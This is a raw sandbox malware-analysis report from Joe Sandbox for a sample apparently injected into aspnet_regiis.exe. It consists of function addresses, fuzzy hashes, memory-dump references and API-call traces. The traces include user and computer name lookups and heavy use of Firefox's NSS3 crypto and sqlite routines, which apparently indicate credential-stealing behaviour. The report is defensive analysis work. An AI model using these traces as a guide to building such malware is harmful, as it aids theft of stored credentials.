Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: a04dcdba77f720c6b09d7e083a685f9e78a5e8992706fddcb954d5abcbd7a6ef
Instruction ID: 9a839c39f909fb543ebf6c90c339950996bf5a803da97abc017ae63c49e14c8c
Opcode Fuzzy Hash: a04dcdba77f720c6b09d7e083a685f9e78a5e8992706fddcb954d5abcbd7a6ef
Instruction Fuzzy Hash: 8DE01231A4434C6BDB51DB50CC99FAD736C9B44B01F404294BA0C5A1C0DA70AB458BE1

Function 02751150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 027643F0: GetProcessHeap.KERNEL32(00000000,00000104,027636DB,0276D6E3), ref: 027643FD
Part of subcall function 027643F0: RtlAllocateHeap.NTDLL(00000000), ref: 02764404
Part of subcall function 027643F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276441C

Part of subcall function 027643B0: GetProcessHeap.KERNEL32(00000000,00000104,02751177,02BA0588,027636DB,0276D6E3), ref: 027643BD
Part of subcall function 027643B0: RtlAllocateHeap.NTDLL(00000000), ref: 027643C4
Part of subcall function 027643B0: GetUserNameA.ADVAPI32(?,00000104), ref: 027643DC

ExitProcess.KERNEL32 ref: 02751186

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: a2856d967170347248e2bb91b15319a4716d7363d90a92ba4820902a12471d23
Instruction ID: 58d68735915164e9910be5c8de1452cf619834fd0c7736c9f75a19cb5f1efd05
Opcode Fuzzy Hash: a2856d967170347248e2bb91b15319a4716d7363d90a92ba4820902a12471d23
Instruction Fuzzy Hash: DCE017B5E84304B3DA1673B57D1DB7672AE5F09706F880924ED0893102FA65F0248A66

Function 02764FE0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 02764FE8

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 57b7ed685e2051614bbab2febbbbfde0be0fbf536aee29cb49be3ebef1e92af1
Instruction ID: 53b1cb2e7fdaf946c79e1d4ccfa6e415649ce1b0aab401bd575b7054bffa80e1
Opcode Fuzzy Hash: 57b7ed685e2051614bbab2febbbbfde0be0fbf536aee29cb49be3ebef1e92af1
Instruction Fuzzy Hash: D8C012B0D0420CEB8B00CF98E8058497BECEB05204B004594FC0DD3301D531AE2087A5

Non-executed Functions

Function 6C424840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C40601B,?,00000000,?), ref: 6C42486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4248A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4248BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C4248DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C4248F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C42490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C424919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C42493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C424970
PORT_Alloc_Util.NSS3(00000001), ref: 6C4249A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4249AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4249D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C4249F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C424A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C424A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C424A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C424A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C424A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C424A81
free.MOZGLUE(00000000), ref: 6C424AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C424ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C424ADC
free.MOZGLUE(00000000), ref: 6C424B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C424B33

Part of subcall function 6C424120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C42413D
Part of subcall function 6C424120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C424162
Part of subcall function 6C424120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C42416B
Part of subcall function 6C424120: PL_strncasecmp.NSS3(2BBl,?,00000001), ref: 6C424187
Part of subcall function 6C424120: NSSUTIL_ArgSkipParameter.NSS3(2BBl), ref: 6C4241A0
Part of subcall function 6C424120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4241B4
Part of subcall function 6C424120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C4241CC
Part of subcall function 6C424120: NSSUTIL_ArgFetchValue.NSS3(2BBl,?), ref: 6C424203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C424B53
free.MOZGLUE(00000000), ref: 6C424B94
free.MOZGLUE(?), ref: 6C424BA7
free.MOZGLUE(00000000), ref: 6C424BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C424BC8

Strings

timeout, xrefs: 6C424A38, 6C424A7B
slotFlags, xrefs: 6C424A22
askpw, xrefs: 6C424A4A
hasRootCerts, xrefs: 6C424AD6
hasRootTrust, xrefs: 6C424B4D
every, xrefs: 6C424A66
rootFlags, xrefs: 6C424AB9, 6C424B2E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: 31532f9ffde079781279c796698983223a6b8836dbb50946d2f80b4d434a99bb
Instruction ID: 5760c883a07175afa542f99ffb31dabce2f9d8e869b3e874c528726eee64001a
Opcode Fuzzy Hash: 31532f9ffde079781279c796698983223a6b8836dbb50946d2f80b4d434a99bb
Instruction Fuzzy Hash: 5BC11874E052554BEB01CFB89C46FAE7FB4EF06289F141028EC55A7B01E729E915CBA0

Function 6C42EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C42C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C42DAE2,?), ref: 6C42C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C42F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C42F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C42F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C42F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C4F218C), ref: 6C42F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C42F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C42F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C42F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C42F210

Part of subcall function 6C3D52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C42F1E9,?,00000000,?,?), ref: 6C3D52F5
Part of subcall function 6C3D52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C3D530F
Part of subcall function 6C3D52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C3D5326
Part of subcall function 6C3D52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C42F1E9,?,00000000,?,?), ref: 6C3D5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C42F227

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C42F23E

Part of subcall function 6C41BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C3CE708,00000000,00000000,00000004,00000000), ref: 6C41BE6A
Part of subcall function 6C41BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C3D04DC,?), ref: 6C41BE7E
Part of subcall function 6C41BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C41BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C42F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C42F3A8

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C42F3B3

Part of subcall function 6C3D2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C3D2D3C
Part of subcall function 6C3D2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C3D2D5F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 805f8204399191d6ad53f942642b4a8dff69be9509ebd5b1240d894e422c2748
Instruction ID: 6572b8c1c9ff0f05df2dd07497f0a24d16016fcf6c291d47d9f28cfec26de83e
Opcode Fuzzy Hash: 805f8204399191d6ad53f942642b4a8dff69be9509ebd5b1240d894e422c2748
Instruction Fuzzy Hash: EED1A2B6E022259FEB00CF99D881E9EB7F5FF48309F558029D915A7B11E735E806CB90

Function 6C35AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C47CF46,?,6C34CDBD,?,6C47BF31,?,?,?,?,?,?,?), ref: 6C35B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C47CF46,?,6C34CDBD,?,6C47BF31), ref: 6C35B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C47CF46,?,6C34CDBD,?,6C47BF31), ref: 6C35B0A2
CloseHandle.KERNEL32(?,?,6C47CF46,?,6C34CDBD,?,6C47BF31,?,?,?,?,?,?,?,?,?), ref: 6C35B100
sqlite3_free.NSS3(?,?,00000002,?,6C47CF46,?,6C34CDBD,?,6C47BF31,?,?,?,?,?,?,?), ref: 6C35B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C47CF46,?,6C34CDBD,?,6C47BF31), ref: 6C35B12D

Part of subcall function 6C349EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C35C6FD,?,?,?,?,6C3AF965,00000000), ref: 6C349F0E
Part of subcall function 6C349EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C3AF965,00000000), ref: 6C349F5D

Strings

`Ml, xrefs: 6C35B0DF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `Ml
API String ID: 3155957115-2599866691
Opcode ID: b6edbb9bf6a661ef1f48a3a55e4da176f988b59c33252796018fc05b9a7ac1cc
Instruction ID: cef5de9d2deae07f9c39ec97811e108e453c9e075f04d70ae5c7d4f20a32b680
Opcode Fuzzy Hash: b6edbb9bf6a661ef1f48a3a55e4da176f988b59c33252796018fc05b9a7ac1cc
Instruction Fuzzy Hash: F191DBB0A042058FDB04CF25CC85EBBB7F5BF45308B55462DE4169BA50EB36E9A0CFA5

Function 6C3F0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C3F0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C3F0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C3F1006
PK11_FreeSymKey.NSS3(?), ref: 6C3F101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3F1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C3F103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C3F1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C3F108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C3F10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C3F10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C3F112E

Part of subcall function 6C3F1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C3F08C4,?,?), ref: 6C3F15B8
Part of subcall function 6C3F1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C3F08C4,?,?), ref: 6C3F15C1
Part of subcall function 6C3F1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F162E
Part of subcall function 6C3F1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F1637

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: bd7264d6827e2055086deb51919b4b097623edb3b131042f7ef20cc2eae36e57
Instruction ID: e75d031e00459ad7a4caac314286d92ecdf3e63e400249eb57505bba198226ba
Opcode Fuzzy Hash: bd7264d6827e2055086deb51919b4b097623edb3b131042f7ef20cc2eae36e57
Instruction Fuzzy Hash: 3F71D5B1E002068FDB00CFA5DC84AAAF7F5BF44318F148A2CE92997711E732D946CB91

Function 6C350FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C34CA30: EnterCriticalSection.KERNEL32(?,?,?,6C3AF9C9,?,6C3AF4DA,6C3AF9C9,?,?,6C37369A), ref: 6C34CA7A
Part of subcall function 6C34CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C34CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C35103E
EnterCriticalSection.KERNEL32(?), ref: 6C351139
LeaveCriticalSection.KERNEL32(?), ref: 6C351190
sqlite3_free.NSS3(00000000), ref: 6C351227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C35126E
sqlite3_free.NSS3(?), ref: 6C35127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C351267
PMl, xrefs: 6C35109E
winAccess, xrefs: 6C35129B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: PMl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-2587650245
Opcode ID: 35a065991ed931d5f9f3591d647e065302ab8fcc355185c388b7773375ac5983
Instruction ID: 2c820b4e4f972a134e1db373f27955948cf3bbb2c1d28b1b0e4c3e7b99f37936
Opcode Fuzzy Hash: 35a065991ed931d5f9f3591d647e065302ab8fcc355185c388b7773375ac5983
Instruction Fuzzy Hash: EA7116317052019FEB049F25DC8EE6A73B5EB86328F550229E81187E80DB35DD51CFD6

Function 6C416C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3C1C6F,00000000,00000004,?,?), ref: 6C416C3F

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C3C1C6F,00000000,00000004,?,?), ref: 6C416C60
PR_ExplodeTime.NSS3(00000000,6C3C1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C3C1C6F,00000000,00000004,?,?), ref: 6C416C94

Strings

gfff, xrefs: 6C416CFD
gfff, xrefs: 6C416D30
gfff, xrefs: 6C416CF5
gfff, xrefs: 6C416D66
gfff, xrefs: 6C416D9C

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: c526974ae0ef377e716d98fd02788704f34aee5060c941dcf8e28436c9f62ea6
Instruction ID: 3fc7d21e44df28ef0655a307e43d761cbb8ba59f38d14bc68b51bdfaa1e9d703
Opcode Fuzzy Hash: c526974ae0ef377e716d98fd02788704f34aee5060c941dcf8e28436c9f62ea6
Instruction Fuzzy Hash: 3B514D72B015494FC708CDADDC52AEAB7D6DBA4310F48C23AE841DBB85D638D906C751

Function 6C490F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C491027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4910B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C491353

Strings

zeroblob(%d), xrefs: 6C491223
%02x, xrefs: 6C4912F6
'%.*q', xrefs: 6C491217, 6C491292
%lld, xrefs: 6C49114B
$, xrefs: 6C4912A0
NULL, xrefs: 6C49119E
-- , xrefs: 6C490FF5

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 793470cfbccec08e46adb190c3ba252255f9e5c89126cdbb9d7125e06ef07713
Instruction ID: db8d968439886fa257b40bfe7f0c192d64caaecb6ed93b7cf4eba7c7ff877460
Opcode Fuzzy Hash: 793470cfbccec08e46adb190c3ba252255f9e5c89126cdbb9d7125e06ef07713
Instruction Fuzzy Hash: F3E1AD71A083909FD715CF14C880E6BBBF9AF8A348F14891DE9D587B51E771E846CB82

Function 6C498FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C498FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4990DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C499118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C49915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4991C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C499209

Strings

UUUU, xrefs: 6C499255
3333, xrefs: 6C49925E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 6cabbab4702d10e8b1459394f30e4199f7de336e08d22ce932d765a1bb3f7307
Instruction ID: 516db5680ce8a3b398b32c417684e67aa0c11cba63dd18e47e8c3e6abf968d22
Opcode Fuzzy Hash: 6cabbab4702d10e8b1459394f30e4199f7de336e08d22ce932d765a1bb3f7307
Instruction Fuzzy Hash: 28A19E72E001259FDB04CB68CC91FAEBBB5AB48324F0A4129D919AB341E736AC41CBD1

Function 6C4D8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C5214E4,6C48CC70), ref: 6C4D8D47
PR_GetCurrentThread.NSS3 ref: 6C4D8D98

Part of subcall function 6C3B0F00: PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B
Part of subcall function 6C3B0F00: PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C4D8E7B
htons.WSOCK32(?), ref: 6C4D8EDB
PR_GetCurrentThread.NSS3 ref: 6C4D8F99
